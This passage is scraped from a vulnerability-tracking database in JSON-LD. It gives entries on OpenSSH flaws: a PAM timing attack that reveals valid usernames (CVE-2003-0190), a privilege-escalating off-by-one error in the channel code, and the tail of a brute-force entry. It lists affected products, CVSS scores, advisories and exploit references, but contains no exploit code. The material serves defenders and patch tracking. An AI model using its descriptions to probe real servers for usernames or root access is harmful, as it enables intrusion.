"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-13T00:00:00",
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"date": "2017-01-23T00:06:00",
"db": "BID",
"id": "75990"
},
{
"date": "2016-07-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"date": "2022-12-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"date": "2022-12-13T12:15:17.307000",
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "133087"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Openssh of sshd of auth2-chall.c Inside kbdint_next_device Vulnerability to execute brute force attacks in functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
}
],
"trust": 0.6
}
}
VAR-200305-0063
Vulnerability from variot - Updated: 2024-03-18 20:58OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. Portable Edition OpenSSH If this setting is PAM If enabled in conjunction with an implementation of OpenSSH When authentication fails, the authentication result is determined depending on the existing username and non-existing username. "Permission denied, please try again." There is a vulnerability where there is a difference in the time it takes to return the .It may be possible to guess whether the username exists or not. The portable version of OpenSSH is reported prone to an information-disclosure vulnerability. The portable version is distributed for operating systems other than its native OpenBSD platform. This issue is related to BID 7467. Reportedly, the previous fix for BID 7467 didn't completely fix the issue. This current issue may involve differing code paths in PAM, resulting in a new vulnerability, but this has not been confirmed. Exploiting this vulnerability allows remote attackers to test for the presence of valid usernames. Knowledge of usernames may aid them in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200305-0063",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "openpkg",
"scope": "eq",
"trust": 1.0,
"vendor": "openpkg",
"version": "1.2"
},
{
"model": "openpkg",
"scope": "eq",
"trust": 1.0,
"vendor": "openpkg",
"version": "1.3"
},
{
"model": "scalance x204rna ecc",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.2.7"
},
{
"model": "scalance x204rna",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.2.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "3.6.1"
},
{
"model": "openssh",
"scope": "lt",
"trust": 1.0,
"vendor": "openbsd",
"version": "3.6.1"
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.1"
},
{
"model": "openssh",
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.2"
},
{
"model": "turbolinux server",
"scope": null,
"trust": 0.8,
"vendor": "\u30bf\u30fc\u30dc\u30ea\u30ca\u30c3\u30af\u30b9",
"version": null
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "8.0"
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.3"
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "9"
},
{
"model": "asianux server",
"scope": null,
"trust": 0.8,
"vendor": "\u30b5\u30a4\u30d0\u30fc\u30c8\u30e9\u30b9\u30c8\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.6,
"vendor": "suse",
"version": "9"
},
{
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "3.5"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "3.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openbsd",
"version": "3.4p1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openbsd",
"version": "3.6.1p1"
},
{
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.9"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.8.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.8"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": ".1p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.5"
},
{
"model": "p1-1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.3"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2.3"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0"
},
{
"model": "linux ppc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "4.1"
},
{
"model": "linux ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "4.1"
},
{
"model": "linux ia32",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "4.1"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "8.0"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "7.0"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "6.0"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "8.0"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "7.0"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "6.5"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "6.1"
},
{
"model": "advanced server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "6.0"
},
{
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"model": "p2",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
}
],
"sources": [
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.6.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:3.6.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openpkg:openpkg:1.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openpkg:openpkg:1.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:scalance_x204rna_ecc_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.7",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:scalance_x204rna_ecc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:scalance_x204rna_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.7",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:scalance_x204rna:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Marco Ivaldi\u203b raptor@mediaservice.net",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0190",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2003-0190",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2003-0190",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200305-021",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2003-0190",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. Portable Edition OpenSSH If this setting is PAM If enabled in conjunction with an implementation of OpenSSH When authentication fails, the authentication result is determined depending on the existing username and non-existing username. \"Permission denied, please try again.\" There is a vulnerability where there is a difference in the time it takes to return the .It may be possible to guess whether the username exists or not. The portable version of OpenSSH is reported prone to an information-disclosure vulnerability. The portable version is distributed for operating systems other than its native OpenBSD platform. \nThis issue is related to BID 7467. Reportedly, the previous fix for BID 7467 didn\u0027t completely fix the issue. This current issue may involve differing code paths in PAM, resulting in a new vulnerability, but this has not been confirmed. \nExploiting this vulnerability allows remote attackers to test for the presence of valid usernames. Knowledge of usernames may aid them in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0190"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "VULMON",
"id": "CVE-2003-0190"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=26",
"trust": 0.3,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2003-0190",
"trust": 3.9
},
{
"db": "BID",
"id": "7467",
"trust": 2.8
},
{
"db": "SIEMENS",
"id": "SSA-412672",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136",
"trust": 0.8
},
{
"db": "TURBO",
"id": "TLSA-2003-31",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20030430 OPENSSH/PAM TIMING ATTACK ALLOWS REMOTE USERS IDENTIFICATION",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20030430 OPENSSH/PAM TIMING ATTACK ALLOWS REMOTE USERS IDENTIFICATION",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20030806 [OPENPKG-SA-2003.035] OPENPKG SECURITY ADVISORY (OPENSSH)",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2003:224",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2003:222",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:445",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021",
"trust": 0.6
},
{
"db": "BID",
"id": "11781",
"trust": 0.3
},
{
"db": "ICS CERT",
"id": "ICSA-22-349-21",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "26",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2003-0190",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"id": "VAR-200305-0063",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.53838384
},
"last_update_date": "2024-03-18T20:58:00.361000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RHSA-2003",
"trust": 0.8,
"url": "http://www.openbsd.org/"
},
{
"title": "Ubuntu Security Notice: openssh information leakage",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-34-1"
},
{
"title": "https://github.com/octane23/CASE-STUDY-1",
"trust": 0.1,
"url": "https://github.com/octane23/case-study-1 "
},
{
"title": "advisories",
"trust": 0.1,
"url": "https://github.com/0xdea/advisories "
},
{
"title": "exploits",
"trust": 0.1,
"url": "https://github.com/0xdea/exploits "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-203",
"trust": 1.0
},
{
"problemtype": "Observable discrepancy (CWE-203) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/7467"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-april/004815.html"
},
{
"trust": 1.7,
"url": "http://lab.mediaservice.net/advisory/2003-01-openssh.txt"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2003-222.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2003-224.html"
},
{
"trust": 1.7,
"url": "http://www.turbolinux.com/security/tlsa-2003-31.txt"
},
{
"trust": 1.2,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=105172058404810\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=105172058404810\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=106018677302607\u0026w=2"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a445"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0190"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106018677302607\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:445"
},
{
"trust": 0.3,
"url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=248747"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2003-224.html"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/patches/linux/security.html"
},
{
"trust": 0.3,
"url": "/archive/1/320031"
},
{
"trust": 0.3,
"url": "/archive/1/320302"
},
{
"trust": 0.3,
"url": "/archive/1/320239"
},
{
"trust": 0.3,
"url": "/archive/1/320280"
},
{
"trust": 0.3,
"url": "/archive/1/320276"
},
{
"trust": 0.3,
"url": "/archive/1/320270"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/203.html"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/34-1/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/26/"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-05-12T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"date": "2004-11-30T00:00:00",
"db": "BID",
"id": "11781"
},
{
"date": "2003-04-30T00:00:00",
"db": "BID",
"id": "7467"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"date": "2003-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"date": "2003-05-12T04:00:00",
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-02-15T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0190"
},
{
"date": "2007-05-08T23:09:00",
"db": "BID",
"id": "11781"
},
{
"date": "2007-02-22T02:36:00",
"db": "BID",
"id": "7467"
},
{
"date": "2024-03-04T01:48:00",
"db": "JVNDB",
"id": "JVNDB-2003-000136"
},
{
"date": "2006-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200305-021"
},
{
"date": "2024-02-15T18:46:16.187000",
"db": "NVD",
"id": "CVE-2003-0190"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH\u00a0 of \u00a0PAM\u00a0 Vulnerability to timing attack in authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2003-000136"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "11781"
},
{
"db": "BID",
"id": "7467"
},
{
"db": "CNNVD",
"id": "CNNVD-200305-021"
}
],
"trust": 1.2
}
}
VAR-200203-0011
Vulnerability from variot - Updated: 2024-02-26 22:51Off-by-one error in the channel code of OpenSSH 2.0 through 3.0.2 allows local users or remote malicious servers to gain privileges. OpenSSH is a program used to provide secure connection and communications between client and servers. Channels are used to segregate differing traffic between the client and the server. OpenSSH is a suite implementing the SSH protocol. It includes client and server software, and supports ssh and sftp. It was initially developed for BSD, but is also widely used for Linux, Solaris, and other UNIX-like operating systems. A vulnerability has been announced in some versions of OpenSSH. A malicious client may exploit this vulnerability by connecting to a vulnerable server. Valid credentials are believed to be required, since the exploitable condition reportedly occurs after successful authentication. An examination of the code suggests this, but it has not been confirmed by the maintainer. Administrators should assume that this can be exploited without authentication and should patch vulnerable versions immediately. It encrypts and transmits all network communications, thereby avoiding attacks at many network layers, and is a very useful network connection tool. A user with a legal login account can use this vulnerability to obtain the root authority of the host. To implement X11, TCP and proxy forwarding, OpenSSH multiplexes multiple "channels" on a single TCP connection. The program may mistakenly use memory data outside the normal range, and an attacker with a legitimate login account logs in After entering the system, this vulnerability can be exploited to allow sshd to execute arbitrary commands with root privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
